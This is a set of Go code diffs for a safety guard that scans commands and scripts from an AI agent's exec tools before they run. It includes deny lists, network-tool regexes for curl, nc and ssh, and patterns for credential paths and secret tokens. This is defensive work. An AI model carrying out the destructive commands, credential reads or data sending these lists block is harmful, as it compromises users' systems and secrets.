+		resolver, ok := execTool.(tool.CodeExecPermissionContextResolver)
+		if !ok {
+			return Request{}, false, errors.New(
+				"tool safety guard: code executor does not expose its execution context",
+			)
+		}
+		resolved, err := resolver.ResolveCodeExecPermissionContext()
+		if err != nil {
+			return Request{}, false, fmt.Errorf(
+				"tool safety guard: resolve code exec context: %w", err,
+			)
+		}
+		base.TimeoutSeconds = resolved.TimeoutSeconds
 	}
 	base.Backend = BackendCodeExec
 	base.CodeBlocks = blocks

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -42,7 +42,9 @@ type PermissionPolicy struct {
 }
 
 // NewPermissionPolicy returns a tool.PermissionPolicy that maps safety scan
-// decisions onto the framework allow / deny / ask actions.
+// decisions onto the framework allow / deny / ask actions. Tools without a
+// built-in or registered parser use Policy.UnknownToolAction, which defaults
+// to ask; recognized no-op requests remain allowed.
 func NewPermissionPolicy(policy Policy, opts ...PermissionOption) *PermissionPolicy {
 	p := &PermissionPolicy{
 		policy:         policy.withDefaults(),
@@ -87,18 +89,33 @@ func (p *PermissionPolicy) CheckToolPermission(
 	ctx context.Context,
 	req *tool.PermissionRequest,
 ) (tool.PermissionDecision, error) {
-	_ = ctx
 	if p == nil {
 		return tool.DenyPermission("tool safety guard permission policy is nil"), nil
+	}
+	if ctx != nil {
+		if err := ctx.Err(); err != nil {
+			return tool.DenyPermission("tool safety guard scan interrupted"), err
+		}
 	}
 	scanReq, ok, err := p.scanRequest(req)
 	if err != nil {
 		return tool.DenyPermission(err.Error()), nil
 	}
-	if !ok {
-		return tool.AllowPermission(), nil
+	if ctx != nil {
+		if err := ctx.Err(); err != nil {
+			return tool.DenyPermission("tool safety guard scan interrupted"), err
+		}
 	}
-	report := Scan(scanReq, p.policy)
+	if !ok {
+		if p.recognizesRequestTool(req) {
+			return tool.AllowPermission(), nil
+		}
+		return p.unknownToolDecision(req), nil
+	}
+	report, err := scanContext(ctx, scanReq, p.policy)
+	if err != nil {
+		return tool.DenyPermission("tool safety guard scan interrupted"), err
+	}
 	if err := p.writeAudit(report); err != nil {
 		return tool.DenyPermission("tool safety audit failed"), err
 	}
@@ -111,6 +128,54 @@ func (p *PermissionPolicy) CheckToolPermission(
 		return tool.AskPermission(permissionReason(report)), nil
 	default:
 		return tool.DenyPermission("tool safety guard returned an unknown decision"), nil
+	}
+}
+
+func (p *PermissionPolicy) recognizesRequestTool(
+	req *tool.PermissionRequest,
+) bool {
+	if req == nil {
+		return false
+	}
+	if builtin, _ := resolveBuiltinExecTool(req, true); builtin != "" {
+		return true
+	}
+	name := req.ToolName
+	if name == "" && req.Declaration != nil {
+		name = req.Declaration.Name
+	}
+	return p.requestParsers[name] != nil
+}
+
+func (p *PermissionPolicy) unknownToolDecision(
+	req *tool.PermissionRequest,
+) tool.PermissionDecision {
+	// A nil request cannot identify or execute a tool. Preserve the no-op
+	// behavior for callers probing the policy without a pending invocation.
+	if req == nil {
+		return tool.AllowPermission()
+	}
+	name := strings.TrimSpace(req.ToolName)
+	if name == "" && req.Declaration != nil {
+		name = strings.TrimSpace(req.Declaration.Name)
+	}
+	if name == "" {
+		name = "<unnamed>"
+	}
+	reason := fmt.Sprintf(
+		"tool safety guard has no request parser for tool %q", name,
+	)
+	switch p.policy.UnknownToolAction {
+	case tool.PermissionActionAllow:
+		return tool.AllowPermission()
+	case tool.PermissionActionAsk:
+		return tool.AskPermission(reason)
+	case tool.PermissionActionDeny:
+		return tool.DenyPermission(reason)
+	default:
+		return tool.DenyPermission(
+			"tool safety guard has an invalid unknown tool action",
+		)
 	}
 }
 

--- a/tool/safety/permission.go
+++ b/tool/safety/permission.go
@@ -184,9 +184,15 @@ func RequestFromPermissionRequest(
 	}
 	switch toolName {
 	case "workspace_exec":
-		return parseExecLikeArgs(base, req.Arguments, BackendWorkspaceExec, "cwd")
+		return parseExecLikeArgs(
+			base, req.Arguments, BackendWorkspaceExec, "cwd", req.Tool,
+		)
 	case "exec_command":
-		return parseExecLikeArgs(base, req.Arguments, BackendHostExec, "workdir")
+		return parseExecLikeArgs(
+			base, req.Arguments, BackendHostExec, "workdir", req.Tool,
+		)
+	case "write_stdin", "workspace_write_stdin":
+		return parseWriteStdinArgs(base, req.Arguments, toolName)
 	case "execute_code":
 		return parseCodeExecArgs(base, req.Arguments)
 	default:
@@ -212,22 +218,34 @@ func parseExecLikeArgs(
 	args []byte,
 	backend string,
 	cwdField string,
+	execTool tool.Tool,
 ) (Request, bool, error) {
 	var in execLikeArgs
 	if err := json.Unmarshal(args, &in); err != nil {
 		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
 	}
-	timeout := in.Timeout
-	if timeout <= 0 {
-		if in.TimeoutSec != nil {
-			timeout = *in.TimeoutSec
-		} else if in.TimeoutSecOld != nil {
-			timeout = *in.TimeoutSecOld
-		}
+	timeout := 0
+	if in.TimeoutSec != nil {
+		timeout = *in.TimeoutSec
+	} else if in.TimeoutSecOld != nil {
+		timeout = *in.TimeoutSecOld
+	}
+	if backend == BackendWorkspaceExec && timeout <= 0 {
+		timeout = in.Timeout
 	}
 	cwd := in.Cwd
 	if cwdField == "workdir" {
 		cwd = in.Workdir
+	}
+	if resolver, ok := execTool.(tool.ExecPermissionContextResolver); ok {
+		resolved, err := resolver.ResolveExecPermissionContext(args)
+		if err != nil {
+			return Request{}, false, fmt.Errorf(
+				"tool safety guard: resolve exec context: %w", err,
+			)
+		}
+		cwd = resolved.Cwd
+		timeout = resolved.TimeoutSeconds
 	}
 	base.Command = in.Command
 	base.Cwd = cwd
@@ -236,6 +254,34 @@ func parseExecLikeArgs(
 	base.TimeoutSeconds = timeout
 	base.Background = in.Background
 	base.TTY = boolValue(in.TTY) || boolValue(in.PTY)
+	return base, true, nil
+}
+
+type writeStdinArgs struct {
+	Chars         string `json:"chars"`
+	AppendNewline *bool  `json:"append_newline"`
+	Submit        *bool  `json:"submit"`
+}
+
+func parseWriteStdinArgs(
+	base Request,
+	args []byte,
+	toolName string,
+) (Request, bool, error) {
+	var in writeStdinArgs
+	if err := json.Unmarshal(args, &in); err != nil {
+		return Request{}, false, fmt.Errorf("tool safety guard: invalid args: %w", err)
+	}
+	if in.Chars == "" && !boolValue(in.AppendNewline) && !boolValue(in.Submit) {
+		return Request{}, false, nil
+	}
+	base.Command = in.Chars
+	base.InteractiveWrite = true
+	if toolName == "workspace_write_stdin" {
+		base.Backend = BackendWorkspaceExec
+	} else {
+		base.Backend = BackendHostExec
+	}
 	return base, true, nil
 }
 

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -588,15 +588,7 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 		}
 		name := commandName(argv[0])
 		full := strings.Join(argv, " ")
-		if s.commandDenied(name) {
-			findings = append(findings, newFinding(
-				DecisionDeny,
-				RiskHigh,
-				"policy.denied_command",
-				[]string{fmt.Sprintf("command %q is denied", name)},
-				"Remove the denied command or change the policy after review.",
-			))
-		}
+		findings = append(findings, s.scanDeniedCommand(name)...)
 		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(argv[0]) {
 			findings = append(findings, newFinding(
 				DecisionDeny,
@@ -618,9 +610,30 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 		}
 		findings = append(findings, s.scanDangerousCommand(name, argv)...)
 		findings = append(findings, s.scanReviewCommand(full)...)
+		for _, effective := range commandChain(argv)[1:] {
+			effectiveName := commandName(effective[0])
+			findings = append(findings, s.scanDeniedCommand(effectiveName)...)
+			findings = append(findings,
+				s.scanDangerousCommand(effectiveName, effective)...)
+			findings = append(findings,
+				s.scanReviewCommand(strings.Join(effective, " "))...)
+		}
 		findings = append(findings, s.scanDeniedPaths(argv)...)
 	}
 	return findings
+}
+
+func (s scanner) scanDeniedCommand(name string) []Finding {
+	if !s.commandDenied(name) {
+		return nil
+	}
+	return []Finding{newFinding(
+		DecisionDeny,
+		RiskHigh,
+		"policy.denied_command",
+		[]string{fmt.Sprintf("command %q is denied", name)},
+		"Remove the denied command or change the policy after review.",
+	)}
 }
 
 func (s scanner) scanDangerousCommand(name string, argv []string) []Finding {
@@ -901,17 +914,25 @@ func gitGlobalOptionHasValue(arg string) bool {
 }
 
 func containsNetworkCommand(argv []string) bool {
-	for depth := 0; depth < 8 && len(argv) > 0; depth++ {
-		if isNetworkCommand(argv) {
+	for _, command := range commandChain(argv) {
+		if isNetworkCommand(command) {
 			return true
 		}
+	}
+	return false
+}
+
+func commandChain(argv []string) [][]string {
+	var commands [][]string
+	for len(argv) > 0 {
+		commands = append(commands, argv)
 		next := unwrapCommand(argv)
-		if len(next) == 0 || len(next) == len(argv) {
-			return false
+		if len(next) == 0 || len(next) >= len(argv) {
+			return commands
 		}
 		argv = next
 	}
-	return false
+	return commands
 }
 
 func unwrapCommand(argv []string) []string {
@@ -949,15 +970,10 @@ func unwrapEnvCommand(argv []string) []string {
 }
 
 func containsEnvSplitString(argv []string) bool {
-	for depth := 0; depth < 8 && len(argv) > 0; depth++ {
-		if commandName(argv[0]) == "env" && envSplitStringRequested(argv) {
+	for _, command := range commandChain(argv) {
+		if commandName(command[0]) == "env" && envSplitStringRequested(command) {
 			return true
 		}
-		next := unwrapCommand(argv)
-		if len(next) == 0 || len(next) == len(argv) {
-			return false
-		}
-		argv = next
 	}
 	return false
 }

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -19,6 +19,7 @@ import (
 	"os"
 	"path/filepath"
 	"regexp"
+	"runtime"
 	"slices"
 	"strconv"
 	"strings"
@@ -596,12 +597,12 @@ func (s scanner) scanParsedCommands(pipe *shellsafe.Pipeline) []Finding {
 				"Remove the denied command or change the policy after review.",
 			))
 		}
-		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(name) {
+		if len(s.policy.AllowedCommands) > 0 && !s.commandAllowed(argv[0]) {
 			findings = append(findings, newFinding(
 				DecisionDeny,
 				RiskMedium,
 				"policy.command_not_allowed",
-				[]string{fmt.Sprintf("command %q is not in allowed_commands", name)},
+				[]string{fmt.Sprintf("command %q is not in allowed_commands", argv[0])},
 				"Use an allowed command or update allowed_commands in the policy.",
 			))
 		}
@@ -697,19 +698,34 @@ func (s scanner) scanReviewCommand(command string) []Finding {
 func (s scanner) scanDeniedPaths(argv []string) []Finding {
 	var findings []Finding
 	for _, arg := range argv[1:] {
-		clean := strings.Trim(arg, `"'`)
-		if s.pathDenied(clean) {
-			findings = append(findings, newFinding(
-				DecisionDeny,
-				RiskCritical,
-				"sensitive.path_access",
-				[]string{fmt.Sprintf("argument references denied path %q", clean)},
-				"Do not access SSH keys, .env files, credential stores, or "+
-					"system directories from tool execution.",
-			))
+		for _, candidate := range pathCandidates(arg) {
+			if s.pathDenied(candidate) {
+				findings = append(findings, newFinding(
+					DecisionDeny,
+					RiskCritical,
+					"sensitive.path_access",
+					[]string{fmt.Sprintf("argument references denied path %q", candidate)},
+					"Do not access SSH keys, .env files, credential stores, or "+
+						"system directories from tool execution.",
+				))
+				break
+			}
 		}
 	}
 	return findings
+}
+
+func pathCandidates(arg string) []string {
+	clean := strings.TrimSpace(strings.Trim(arg, `"'`))
+	if clean == "" {
+		return nil
+	}
+	candidates := []string{clean}
+	if key, value, ok := strings.Cut(clean, "="); ok &&
+		strings.HasPrefix(key, "-") && value != "" {
+		candidates = append(candidates, strings.Trim(value, `"'`))
+	}
+	return candidates
 }
 
 func (s scanner) pathDenied(path string) bool {
@@ -728,8 +744,20 @@ func (s scanner) pathDenied(path string) bool {
 			strings.HasPrefix(normalized, d+"/") {
 			return true
 		}
+		deniedBase := pathBase(d)
+		if strings.HasPrefix(deniedBase, ".") &&
+			strings.Contains(pathBase(normalized), deniedBase) {
+			return true
+		}
 	}
 	return false
+}
+
+func pathBase(path string) string {
+	if index := strings.LastIndex(path, "/"); index >= 0 {
+		return path[index+1:]
+	}
+	return path
 }
 
 func normalizePathForMatch(path string) string {
@@ -746,15 +774,28 @@ func normalizePathForMatch(path string) string {
 
 func (s scanner) scanNetwork(command string) []Finding {
 	var findings []Finding
-	lower := strings.ToLower(command)
-	networkCommand := regexp.MustCompile(`(^|[;&|]\s*)(curl|wget|nc|netcat|ssh|scp|rsync)\b`).
-		FindString(lower) != ""
-	urls := extractURLs(command)
-	for _, raw := range urls {
+	networkCommand := networkCommandRE.MatchString(command)
+	if pipe, err := shellsafe.Parse(command); err == nil {
+		for _, argv := range pipe.Commands {
+			if containsNetworkCommand(argv) {
+				networkCommand = true
+			}
+		}
+	}
+	targets := explicitURLRE.FindAllString(command, -1)
+	if networkCommand {
+		targets = extractURLs(command)
+	}
+	checkedHosts := make(map[string]struct{})
+	for _, raw := range targets {
 		host := hostOf(raw)
 		if host == "" {
 			continue
 		}
+		if _, ok := checkedHosts[host]; ok {
+			continue
+		}
+		checkedHosts[host] = struct{}{}
 		if !s.hostAllowed(host) {
 			findings = append(findings, newFinding(
 				DecisionDeny,
@@ -765,7 +806,7 @@ func (s scanner) scanNetwork(command string) []Finding {
 			))
 		}
 	}
-	if networkCommand && len(urls) == 0 {
+	if networkCommand && len(checkedHosts) == 0 {
 		findings = append(findings, newFinding(
 			DecisionNeedsHumanReview,
 			RiskMedium,
@@ -778,16 +819,110 @@ func (s scanner) scanNetwork(command string) []Finding {
 }
 
 func extractURLs(s string) []string {
-	re := regexp.MustCompile(`https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+`)
-	return re.FindAllString(s, -1)
+	targets := explicitURLRE.FindAllString(s, -1)
+	return append(targets, schemeLessNetworkTargetRE.FindAllString(s, -1)...)
 }
 
 func hostOf(raw string) string {
+	raw = strings.TrimSpace(strings.Trim(raw, `"'`))
+	if !strings.Contains(raw, "://") {
+		raw = "https://" + raw
+	}
 	u, err := url.Parse(raw)
 	if err != nil {
 		return ""
 	}
 	return strings.ToLower(u.Hostname())
+}
+
+func isNetworkCommand(name string) bool {
+	switch name {
+	case "curl", "wget", "nc", "netcat", "ssh", "scp", "rsync":
+		return true
+	default:
+		return false
+	}
+}
+
+func containsNetworkCommand(argv []string) bool {
+	for depth := 0; depth < 8 && len(argv) > 0; depth++ {
+		if isNetworkCommand(commandName(argv[0])) {
+			return true
+		}
+		next := unwrapCommand(argv)
+		if len(next) == 0 || len(next) == len(argv) {
+			return false
+		}
+		argv = next
+	}
+	return false
+}
+
+func unwrapCommand(argv []string) []string {
+	name := commandName(argv[0])
+	switch name {
+	case "env":
+		return unwrapEnvCommand(argv)
+	case "command", "nohup":
+		return unwrapOptionCommand(argv, false)
+	case "timeout":
+		return unwrapTimeoutCommand(argv)
+	case "nice":
+		return unwrapOptionCommand(argv, true)
+	}
+	return argv
+}
+
+func unwrapEnvCommand(argv []string) []string {
+	for i := 1; i < len(argv); {
+		arg := argv[i]
+		if arg == "-u" || arg == "--unset" || arg == "-C" || arg == "--chdir" {
+			i += 2
+			continue
+		}
+		if strings.HasPrefix(arg, "-") || strings.Contains(arg, "=") {
+			i++
+			continue
+		}
+		return argv[i:]
+	}
+	return nil
+}
+
+func unwrapOptionCommand(argv []string, optionHasValue bool) []string {
+	for i := 1; i < len(argv); {
+		arg := argv[i]
+		if optionHasValue && (arg == "-n" || arg == "--adjustment") {
+			i += 2
+			continue
+		}
+		if strings.HasPrefix(arg, "-") {
+			i++
+			continue
+		}
+		return argv[i:]
+	}
+	return nil
+}
+
+func unwrapTimeoutCommand(argv []string) []string {
+	for i := 1; i < len(argv); {
+		arg := argv[i]
+		if arg == "-s" || arg == "--signal" || arg == "-k" || arg == "--kill-after" {
+			i += 2
+			continue
+		}
+		if strings.HasPrefix(arg, "-") {
+			i++
+			continue
+		}
+		i++ // Skip the required duration.
+		if i < len(argv) {
+			return argv[i:]
+		}
+		return nil
+	}
+	return nil
 }
 
 func (s scanner) hostAllowed(host string) bool {
@@ -849,8 +984,7 @@ func (s scanner) scanResourcePatterns(lower string) []Finding {
 }
 
 func longSleep(lower string) bool {
-	re := regexp.MustCompile(`\bsleep\s+([0-9]+)`)
-	m := re.FindStringSubmatch(lower)
+	m := longSleepRE.FindStringSubmatch(lower)
 	if len(m) != 2 {
 		return false
 	}
@@ -869,26 +1003,22 @@ func infiniteLoop(lower string) bool {
 }
 
 func largeOutput(lower string, limit int64) bool {
-	head := regexp.MustCompile(`\bhead\s+-c\s+([0-9]+)`)
-	if m := head.FindStringSubmatch(lower); len(m) == 2 {
+	if m := headBytesRE.FindStringSubmatch(lower); len(m) == 2 {
 		n, _ := strconv.ParseInt(m[1], 10, 64)
 		return n > limit
 	}
 	if strings.Contains(lower, "yes ") || strings.HasPrefix(lower, "yes") {
 		return true
 	}
-	printRepeat := regexp.MustCompile(`print\s*\([^)]*\*\s*([0-9]{7,})`)
-	return printRepeat.MatchString(lower)
+	return printRepeatRE.MatchString(lower)
 }
 
 func highConcurrency(lower string) bool {
-	xargs := regexp.MustCompile(`\bxargs\b[^;&|]*\s-p\s*([0-9]+)`)
-	if m := xargs.FindStringSubmatch(lower); len(m) == 2 {
+	if m := xargsParallelRE.FindStringSubmatch(lower); len(m) == 2 {
 		n, _ := strconv.Atoi(m[1])
 		return n > 8
 	}
-	parallel := regexp.MustCompile(`\bparallel\b[^;&|]*(?:-j|--jobs)\s*([0-9]+)`)
-	if m := parallel.FindStringSubmatch(lower); len(m) == 2 {
+	if m := parallelJobsRE.FindStringSubmatch(lower); len(m) == 2 {
 		n, _ := strconv.Atoi(m[1])
 		return n > 8
 	}
@@ -961,6 +1091,9 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 		shellReq.Command = code
 		shellReq.Backend = BackendCodeExec
 		shellReq.CodeBlocks = nil
+		if strings.ContainsAny(code, "\r\n") {
+			code = normalizeShellScript(code)
+		}
 		findings = append(findings, s.scanShell(shellReq, code)...)
 		return findings
 	}
@@ -984,11 +1117,136 @@ func (s scanner) scanCodeBlock(req Request, block CodeBlock) []Finding {
 func hasShellBypass(lower string) bool {
 	patterns := []string{
 		"sh -c", "bash -c", "zsh -c", "eval ", "`", "$(",
-		"${", ">", "<", " 2>", "exec ",
+		"${", "exec ",
 	}
-	return slices.ContainsFunc(patterns, func(p string) bool {
+	if slices.ContainsFunc(patterns, func(p string) bool {
 		return strings.Contains(lower, p)
-	})
+	}) {
+		return true
+	}
+	return containsUnquotedRedirect(lower)
+}
+
+func containsUnquotedRedirect(command string) bool {
+	inSingle := false
+	inDouble := false
+	escaped := false
+	for i := 0; i < len(command); i++ {
+		char := command[i]
+		if escaped {
+			escaped = false
+			continue
+		}
+		if char == '\\' && !inSingle {
+			escaped = true
+			continue
+		}
+		switch char {
+		case '\'':
+			if !inDouble {
+				inSingle = !inSingle
+			}
+		case '"':
+			if !inSingle {
+				inDouble = !inDouble
+			}
+		case '>', '<':
+			if !inSingle && !inDouble {
+				return true
+			}
+		}
+	}
+	return false
+}
+
+func normalizeShellScript(script string) string {
+	var normalized strings.Builder
+	normalized.Grow(len(script) + strings.Count(script, "\n")*2)
+	inSingle := false
+	inDouble := false
+	for i := 0; i < len(script); i++ {
+		char := script[i]
+		if end, ok := shellLineContinuationEnd(script, i); ok {
+			normalized.WriteByte(' ')
+			i = end
+			continue
+		}
+		if char == '\\' && !inSingle && i+1 < len(script) {
+			normalized.WriteByte(char)
+			normalized.WriteByte(script[i+1])
+			i++
+			continue
+		}
+		if char == '\r' || char == '\n' {
+			i = shellNewlineEnd(script, i)
+			writeScriptNewline(&normalized, script, i+1, inSingle || inDouble)
+			continue
+		}
+		if char == '\'' && !inDouble {
+			inSingle = !inSingle
+		}
+		if char == '"' && !inSingle {
+			inDouble = !inDouble
+		}
+		normalized.WriteByte(char)
+	}
+	return strings.TrimSpace(normalized.String())
+}
+
+func shellLineContinuationEnd(script string, index int) (int, bool) {
+	if script[index] != '\\' || index+1 >= len(script) {
+		return index, false
+	}
+	next := script[index+1]
+	if next != '\n' && next != '\r' {
+		return index, false
+	}
+	end := index + 1
+	if next == '\r' && end+1 < len(script) && script[end+1] == '\n' {
+		end++
+	}
+	return end, true
+}
+
+func shellNewlineEnd(script string, index int) int {
+	if script[index] == '\r' && index+1 < len(script) && script[index+1] == '\n' {
+		return index + 1
+	}
+	return index
+}
+
+func writeScriptNewline(
+	normalized *strings.Builder,
+	script string,
+	next int,
+	quoted bool,
+) {
+	if quoted {
+		normalized.WriteByte(' ')
+		return
+	}
+	writeScriptSeparator(normalized, script, next)
+}
+
+func writeScriptSeparator(normalized *strings.Builder, script string, next int) {
+	current := normalized.String()
+	last := len(current) - 1
+	for last >= 0 && (current[last] == ' ' || current[last] == '\t') {
+		last--
+	}
+	if last < 0 || current[last] == ';' || current[last] == '|' ||
+		current[last] == '&' {
+		return
+	}
+	for next < len(script) && (script[next] == ' ' || script[next] == '\t' ||
+		script[next] == '\r' || script[next] == '\n') {
+		next++
+	}
+	if next >= len(script) || script[next] == ';' || script[next] == '|' ||
+		script[next] == '&' {
+		return
+	}
+	normalized.WriteString(" ; ")
 }
 
 func containsPipeline(command string) bool {
@@ -1026,13 +1284,21 @@ func (s scanner) commandDenied(name string) bool {
 	return false
 }
 
-func (s scanner) commandAllowed(name string) bool {
+func (s scanner) commandAllowed(rawName string) bool {
+	candidate := commandToken(rawName)
 	for _, allowed := range s.policy.AllowedCommands {
-		if strings.EqualFold(commandName(allowed), name) {
+		allowedToken := commandToken(allowed)
+		if candidate == allowedToken ||
+			(runtime.GOOS == "windows" && strings.EqualFold(candidate, allowedToken)) {
 			return true
 		}
 	}
 	return false
+}
+
+func commandToken(name string) string {
+	name = strings.TrimSpace(strings.Trim(name, `"'`))
+	return strings.ReplaceAll(name, "\\", "/")
 }
 
 func commandName(name string) string {
@@ -1069,10 +1335,26 @@ func newFinding(
 }
 
 var (
+	networkCommandRE = regexp.MustCompile(
+		`(?i)(?:^|[;&|]\s*)["']?(?:(?:[a-z]:)?[^\s"';&|]*[/\\])?(?:curl|wget|nc|netcat|ssh|scp|rsync)(?:\.exe|\.cmd|\.bat|\.com)?["']?(?:\s|$)`)
+	explicitURLRE = regexp.MustCompile(
+		`(?i)https?://[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]+`)
+	schemeLessNetworkTargetRE = regexp.MustCompile(
+		`(?i)\b(?:(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}|(?:[0-9]{1,3}\.){3}[0-9]{1,3}|localhost)(?::[0-9]{1,5})?(?:/[A-Za-z0-9._~:/?#\[\]@!$&'()*+,;=%-]*)?`)
+	longSleepRE   = regexp.MustCompile(`\bsleep\s+([0-9]+)`)
+	headBytesRE   = regexp.MustCompile(`\bhead\s+-c\s+([0-9]+)`)
+	printRepeatRE = regexp.MustCompile(
+		`print\s*\([^)]*\*\s*([0-9]{7,})`)
+	xargsParallelRE = regexp.MustCompile(
+		`\bxargs\b[^;&|]*\s-p\s*([0-9]+)`)
+	parallelJobsRE = regexp.MustCompile(
+		`\bparallel\b[^;&|]*(?:-j|--jobs)\s*([0-9]+)`)
 	secretNameRE = regexp.MustCompile(
 		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)`)
 	secretValueRE = regexp.MustCompile(
 		`(?i)(sk-[A-Za-z0-9_-]{12,}|ghp_[A-Za-z0-9_]{12,}|xox[baprs]-[A-Za-z0-9-]{10,}|-----BEGIN [A-Z ]*PRIVATE KEY-----)`)
+	secretNameValueRE = regexp.MustCompile(
+		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
 )
 
 func looksSensitive(text string) bool {
@@ -1089,9 +1371,7 @@ func newRedactor() *redactor { return &redactor{} }
 func (r *redactor) redact(s string) string {
 	orig := s
 	s = secretValueRE.ReplaceAllString(s, "[REDACTED_SECRET]")
-	nameValue := regexp.MustCompile(
-		`(?i)(api[_-]?key|token|password|passwd|secret|private[_-]?key|credential)=([^ \t\n\r;&|]+)`)
-	s = nameValue.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
+	s = secretNameValueRE.ReplaceAllString(s, "$1=[REDACTED_SECRET]")
 	if s != orig {
 		r.changed = true
 	}

--- a/tool/safety/safety.go
+++ b/tool/safety/safety.go
@@ -1,0 +1,1131 @@
+//
+// Tencent is pleased to support the open source community by making trpc-agent-go available.
+//
+// Copyright (C) 2025 Tencent.  All rights reserved.
+//
+// trpc-agent-go is licensed under the Apache License Version 2.0.
+//
+
+// Package safety provides a pre-execution safety guard for command and
+// code-execution tools.
+package safety
+
+import (
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"net/url"
+	"os"
+	"path/filepath"
+	"regexp"
+	"slices"
+	"strconv"
+	"strings"
+	"time"
+
+	"gopkg.in/yaml.v3"
+
+	"trpc.group/trpc-go/trpc-agent-go/internal/shellsafe"
+)
+
+const (
+	// DecisionAllow allows a tool invocation to execute.
+	DecisionAllow Decision = "allow"
+	// DecisionDeny blocks a tool invocation before execution.
+	DecisionDeny Decision = "deny"
+	// DecisionNeedsHumanReview asks a human to approve the invocation.
+	DecisionNeedsHumanReview Decision = "needs_human_review"
+	// DecisionAsk is a lighter approval-required decision for uncertain cases.
+	DecisionAsk Decision = "ask"
+
+	// RiskLow is informational risk.
+	RiskLow RiskLevel = "low"
+	// RiskMedium is review-worthy risk.
+	RiskMedium RiskLevel = "medium"
+	// RiskHigh is likely dangerous risk.
+	RiskHigh RiskLevel = "high"
+	// RiskCritical is immediately dangerous risk.
+	RiskCritical RiskLevel = "critical"
+
+	// BackendWorkspaceExec identifies workspace_exec style shell execution.
+	BackendWorkspaceExec = "workspaceexec"
+	// BackendHostExec identifies direct host shell execution.
+	BackendHostExec = "hostexec"
+	// BackendCodeExec identifies codeexec/codeexecutor execution.
+	BackendCodeExec = "codeexec"
+)
+
+// Decision is the pre-execution safety decision.
+type Decision string
+
+// RiskLevel is the severity assigned to a scan report.
+type RiskLevel string
+
+// Policy controls how commands and scripts are scanned.
+type Policy struct {
+	AllowedCommands      []string `json:"allowed_commands,omitempty" yaml:"allowed_commands,omitempty"`
+	DeniedCommands       []string `json:"denied_commands,omitempty" yaml:"denied_commands,omitempty"`
+	DeniedPaths          []string `json:"denied_paths,omitempty" yaml:"denied_paths,omitempty"`
+	NetworkAllowlist     []string `json:"network_allowlist,omitempty" yaml:"network_allowlist,omitempty"`
+	MaxTimeoutSeconds    int      `json:"max_timeout_seconds,omitempty" yaml:"max_timeout_seconds,omitempty"`
+	MaxOutputBytes       int64    `json:"max_output_bytes,omitempty" yaml:"max_output_bytes,omitempty"`
+	EnvAllowlist         []string `json:"env_allowlist,omitempty" yaml:"env_allowlist,omitempty"`
+	ReviewCommands       []string `json:"review_commands,omitempty" yaml:"review_commands,omitempty"`
+	ReviewShellPipelines bool     `json:"review_shell_pipelines,omitempty" yaml:"review_shell_pipelines,omitempty"`
+	DenyOnParseError     bool     `json:"deny_on_parse_error,omitempty" yaml:"deny_on_parse_error,omitempty"`
+
+	reviewShellPipelinesSet bool
+	denyOnParseErrorSet     bool
+}
+
+// DefaultPolicy returns a conservative policy suitable for workspaceexec,
+// hostexec and codeexec wrappers.
+func DefaultPolicy() Policy {
+	return Policy{
+		DeniedCommands: []string{
+			"dd", "mkfs", "mount", "umount", "shutdown", "reboot",
+			"halt", "poweroff", "sudo", "su", "doas",
+		},
+		DeniedPaths: []string{
+			"/", "/bin", "/boot", "/dev", "/etc", "/lib", "/lib64",
+			"/proc", "/root", "/sbin", "/sys", "/usr", "/var",
+			"~/.ssh", ".ssh", ".env", ".npmrc", ".pypirc",
+			"id_rsa", "id_ed25519", "credentials", "credential",
+			"secrets", "secret",
+		},
+		NetworkAllowlist: []string{
+			"api.github.com", "github.com", "proxy.golang.org",
+			"sum.golang.org", "registry.npmjs.org", "pypi.org",
+			"files.pythonhosted.org",
+		},
+		MaxTimeoutSeconds:    300,
+		MaxOutputBytes:       4 * 1024 * 1024,
+		ReviewShellPipelines: true,
+		DenyOnParseError:     true,
+		ReviewCommands: []string{
+			"go install", "npm install", "npm ci", "pip install",
+			"pip3 install", "apt install", "apt-get install",
+			"brew install", "cargo install",
+		},
+		EnvAllowlist: []string{
+			"PATH", "HOME", "TMPDIR", "TEMP", "TMP", "LANG", "LC_ALL",
+			"CGO_ENABLED", "GOCACHE", "GOMODCACHE", "GOPATH",
+		},
+		reviewShellPipelinesSet: true,
+		denyOnParseErrorSet:     true,
+	}
+}
+
+// LoadPolicy loads a JSON or YAML policy file. Empty policy fields inherit
+// their defaults so operators can override only the knobs they need.
+func LoadPolicy(path string) (Policy, error) {
+	b, err := os.ReadFile(path)
+	if err != nil {
+		return Policy{}, err
+	}
+	var raw map[string]any
+	switch strings.ToLower(filepath.Ext(path)) {
+	case ".json":
+		err = json.Unmarshal(b, &raw)
+	case ".yaml", ".yml", "":
+		err = yaml.Unmarshal(b, &raw)
+	default:
+		err = fmt.Errorf("unsupported policy extension %q", filepath.Ext(path))
+	}
+	if err != nil {
+		return Policy{}, err
+	}
+	p := DefaultPolicy()
+	switch strings.ToLower(filepath.Ext(path)) {
+	case ".json":
+		err = json.Unmarshal(b, &p)
+	default:
+		err = yaml.Unmarshal(b, &p)
+	}
+	if err != nil {
+		return Policy{}, err
+	}
+	if _, ok := raw["review_shell_pipelines"]; ok {
+		p.reviewShellPipelinesSet = true
+	}
+	if _, ok := raw["deny_on_parse_error"]; ok {
+		p.denyOnParseErrorSet = true
+	}
+	return p, nil
+}
+
+func (p Policy) withDefaults() Policy {
+	d := DefaultPolicy()
+	if p.DeniedCommands == nil {
+		p.DeniedCommands = d.DeniedCommands
+	}
+	if p.DeniedPaths == nil {
+		p.DeniedPaths = d.DeniedPaths
+	}
+	if p.NetworkAllowlist == nil {
